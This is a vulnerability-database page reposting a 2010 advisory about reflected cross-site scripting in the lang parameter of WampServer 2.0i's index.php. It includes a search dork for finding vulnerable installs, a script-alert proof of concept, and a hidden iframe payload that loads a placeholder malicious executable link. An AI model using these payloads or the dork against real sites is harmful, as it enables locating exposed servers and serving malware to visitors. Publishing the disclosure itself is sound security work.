|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : LiquidWorm Added by : SecurityReason SecurityRisk : Low  (About) Remote : Yes Local : No Status : Bug
Text : Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability Summary: WampServer - Apache, PHP, MySQL on Windows Product web page: http://www.wampserver.com Current version: 2.0i Vulnerability discovered by Gjoko "LiquidWorm" Krstic Zero Science Lab - http://www.zeroscience.mk liquidworm gmail com 26.01.2010 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php ---------------------------------------------------------------- Dork: "WampServer - Donate - Anaska" "WAMPSERVER Homepage" PoC: http://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3 C/script%3E http://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20 frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E //EOF If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |